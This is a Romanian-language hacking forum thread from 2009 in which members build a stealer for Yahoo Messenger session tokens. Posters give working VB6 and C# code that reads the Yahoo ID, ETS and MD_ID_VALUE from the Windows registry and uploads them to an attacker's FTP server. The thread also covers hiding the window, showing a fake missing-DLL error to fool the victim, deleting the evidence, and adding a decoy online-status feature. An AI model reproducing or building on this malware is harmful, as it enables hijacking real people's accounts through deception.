Fitty Posted July 12, 2009 Report Posted July 12, 2009 (edited) asdasdasdsa Edited April 20, 2012 by Fitty Am bagat culori _|_ Quote
VladuZ Posted July 13, 2009 Report Posted July 13, 2009 Te-ai complicat cam mult, zic eu.Cel mai simplu ETS Stealer ar fi urmatorul:Folosind comanda RegRead se citeste ETS-ul si Yahoo! ID-ul din registri.Salveaza ETS-ul in C:\WINDOWS\id.txt (id fiind Yahoo! ID-ul citit din registri)Uploadeaza .txt-ul folosind Inet, iar pe serverul FTP vom gasi "bill_gates.txt" care contine ETS-ul ID-ului respectiv.Totul executat silentios bineinteles, cu form.hide si la sfarsitul programului punem comanda End, ca programul sa se inchida dupa ce isi termina treaba. Nu are rost sa il punem la start-up.*O masura de siguranta ar fi sa folosim un fisier de resurse, in cazul in care victima nu are MSINET.OCX, sa i-l puna automat in C:\WINDOWS\system32\*Bineinteles daca vrei ca victima sa nu se prinda de smecherie, dupa form1.hide pui un msgbox cu vbCriticalError, ca sa para o eroare mai reala, si scrii acolo ceva de un DLL lipsa. *Este detectat doar de Avira si BitDefender. Quote
Vlachs Posted July 13, 2009 Report Posted July 13, 2009 Te-ai complicat cam mult, zic eu.Cel mai simplu ETS Stealer ar fi urmatorul:Folosind comanda RegRead se citeste ETS-ul si Yahoo! ID-ul din registri.Salveaza ETS-ul in C:\WINDOWS\id.txt (id fiind Yahoo! ID-ul citit din registri)Uploadeaza .txt-ul folosind Inet, iar pe serverul FTP vom gasi "bill_gates.txt" care contine ETS-ul ID-ului respectiv.Totul executat silentios bineinteles, cu form.hide si la sfarsitul programului punem comanda End, ca programul sa se inchida dupa ce isi termina treaba. Nu are rost sa il punem la start-up.*O masura de siguranta ar fi sa folosim un fisier de resurse, in cazul in care victima nu are MSINET.OCX, sa i-l puna automat in C:\WINDOWS\system32\*Bineinteles daca vrei ca victima sa nu se prinda de smecherie, dupa form1.hide pui un msgbox cu vbCriticalError, ca sa para o eroare mai reala, si scrii acolo ceva de un DLL lipsa. *Este detectat doar de Avira si BitDefender.de ce sa te complici cu inet cand mult mai usor il urci pe ftp, era la programming o functie super pentru ftp Quote
VladuZ Posted July 13, 2009 Report Posted July 13, 2009 O fi, dar cu Inet e deasemenea usor.Pui un Inet pe form, si laCommand1_Click()Inet1.Protocol = icFTPInet1.UserName = "userFTP"Inet1.Password = "passwordFTP"Inet1.RemoteHost = "serverFTP"Inet1.RemotePort = 21Inet1.Execute , "put C:\WINDOWS\bennylocal.txt bennyremote.txt"Do While Inet1.StillExecutingDoEventsLoopEnd SubE simpla conceptia, ia C:\WINDOWS\bennylocal.txt si il uploadeaza pe serverul FTP in / (radacina) sub numele de bennyremote.txtDeasemenea poti uploada intr-un anume director folosind:Inet1.Execute , "put C:\WINDOWS\bennylocal.txt /folder/bennyremote.txt"Ori asa, ori fara /-ul din fata lui folder. Nu stiu exact daca creeaza directorul in caz ca nu exista, dar stiu sigur ca suprascrie fisierul bennyremote.txt Quote
Vlachs Posted July 13, 2009 Report Posted July 13, 2009 da e problema inet-ului, daca victima nu il Quote
VladuZ Posted July 13, 2009 Report Posted July 13, 2009 De asta folosesc un fisier de resurse, in caz ca victima nu are MSINET.OCX, il pune programul automat in C:\WINDOWS\system32\ Quote
Fitty Posted July 13, 2009 Author Report Posted July 13, 2009 Din proprie experienta spun ca daca folosesti script bat atunci cand vrei sa urci ceva unattended,nu tipa FW deloc Quote
mosulica Posted July 23, 2009 Report Posted July 23, 2009 Varianta c#adaugati astea : using System.IO;using System.Net;using Microsoft.Win32;dupa InitializeComponent(); bagati liniile de mai jos , modificati cu serverul vostru ftp, user si parola. cel mai simplu:) aa.. si nu uitati sa compilati pt framework 2.0 sa mearga la tot omul.. si de plictiseala mai puteti adauga un yahoo online detector de 2-3 randuri:) sa faca ceva totusi programul sa il foloseasca lumea:)string reg; RegistryKey key; key = Registry.CurrentUser.OpenSubKey(@"Software\Yahoo\pager\"); reg = (string)key.GetValue("Yahoo! User ID"); string path = @"c:\" + reg + ".txt"; File.Delete(path); if (!File.Exists(path)) { StreamWriter sw = File.CreateText(path); sw.WriteLine(reg); reg = (string)key.GetValue("ETS"); sw.WriteLine(reg); reg = (string)key.GetValue("MD_ID_VALUE"); sw.WriteLine(reg); sw.Close(); } reg = (string)key.GetValue("Yahoo! User ID"); System.Net.WebClient client = new System.Net.WebClient(); client.Credentials = new System.Net.NetworkCredential("test@domeniu.ro", "parola"); client.UploadFile("ftp://domeniu.ro" + "/" + new FileInfo(path).Name, "STOR", path); File.Delete(path); Quote
mosulica Posted July 24, 2009 Report Posted July 24, 2009 C#se mai adauga 2 updateuri prima parte zice daca persoana respectiva este v-a dat invisible doar dvs. sau este offline/invisible total , partea a 2-a arata id`ul persoanei in cauza.va trebuie textbox1 , button2 si un picturebox1.if (textBox1.Text != "") { StringBuilder sb = new StringBuilder(); byte[] buf = new byte[8192]; HttpWebRequest request = (HttpWebRequest) WebRequest.Create("http://opi.yahoo.com/online?u=" + textBox1.Text + "&m=t"); HttpWebResponse response = (HttpWebResponse) request.GetResponse(); Stream resStream = response.GetResponseStream(); string tempString = null; int count = 0; do { count = resStream.Read(buf, 0, buf.Length); if (count != 0) { tempString = Encoding.ASCII.GetString(buf, 0, count); sb.Append(tempString); } } while (count > 0); label2.Text = sb.ToString(); pictureBox1.Width = 96; pictureBox1.Height = 96; pictureBox1.Load("http://img.msg.yahoo.com/avatar.php?yids=" + textBox1.Text + "&format=png"); pictureBox1.Refresh(); } Quote
